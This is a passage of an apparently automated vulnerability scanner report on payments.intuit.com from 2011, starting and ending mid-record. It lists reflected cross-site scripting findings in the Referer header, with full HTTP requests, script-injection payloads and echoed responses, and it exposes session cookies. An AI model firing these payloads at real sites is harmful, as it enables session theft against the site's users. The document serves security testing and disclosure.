s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=3d056--><script>alert(1)</script>4284ad0a88b

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:54 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=ApFXrC+jgFomvNBkwIsCdQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:55 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95CB3320A0805192AA117E345C63285
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92685

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=3d056--><script>alert(1)</script>4284ad0a88b | -->
...[SNIP]...

1.19. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/check-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50dd9'-alert(1)-'453e9ddad06 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=50dd9'-alert(1)-'453e9ddad06

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:24 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=o9l6YwbE43TpqpZCRKPeTA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:25 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E12360A0805192AA117E3B77CA933
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 101820

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=50dd9'-alert(1)-'453e9ddad06';
                   </script>
...[SNIP]...

1.20. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/check-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload d6539--><script>alert(1)</script>9940cd93a6a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=d6539--><script>alert(1)</script>9940cd93a6a

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:41 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=SH8LGCxMaF5781x2Vulb3Q**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:42 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E55E90A0805192AA117E31B06669E
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 101853

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=d6539--><script>alert(1)</script>9940cd93a6a | -->
...[SNIP]...

1.21. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/credit-card-processing-equipment.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fffd5'-alert(1)-'a1adc0270af was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=fffd5'-alert(1)-'a1adc0270af

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:11 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=ZLWBpsz-5u6FkdN2z8+SNg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:12 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9609DEA0A0805192AA117E3D7AC7FC0
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=credit_002dcard_002dprocessing_002dequipment_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 134929

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=fffd5'-alert(1)-'a1adc0270af';
                   </script>
...[SNIP]...

1.22. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/credit-card-processing-equipment.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 61f73--><script>alert(1)</script>21df0f4a775 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=61f73--><script>alert(1)</script>21df0f4a775

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:24 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=AwCJVZhrS7L9PL77W4UPvA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:25 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960D1CF0A0805192AA117E387C70DA2
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=credit_002dcard_002dprocessing_002dequipment_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 134961

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=61f73--><script>alert(1)</script>21df0f4a775 | -->
...[SNIP]...

1.23. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/index.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f286'-alert(1)-'8e7fe4c65dd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/index.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=4f286'-alert(1)-'8e7fe4c65dd

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:59:19 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=5CWHEzLF1rjja5gV+LodRA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:36:20 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95B41DF0A0805192AA117E3398C5781
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92653

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=4f286'-alert(1)-'8e7fe4c65dd';
                   </script>
...[SNIP]...

1.24. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/index.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 248a2--><script>alert(1)</script>58daf8a9700 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/index.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=248a2--><script>alert(1)</script>58daf8a9700

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:59:36 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=WOX-8RjjKZe+4ObdoWoTxg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:36:37 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95B81750A0805192AA117E380211446
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92686

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=248a2--><script>alert(1)</script>58daf8a9700 | -->
...[SNIP]...

1.25. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/mobile-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f767'-alert(1)-'9675c472618 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=2f767'-alert(1)-'9675c472618

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:06:03 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=FKPARISn46qm1b8HC-sSUQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
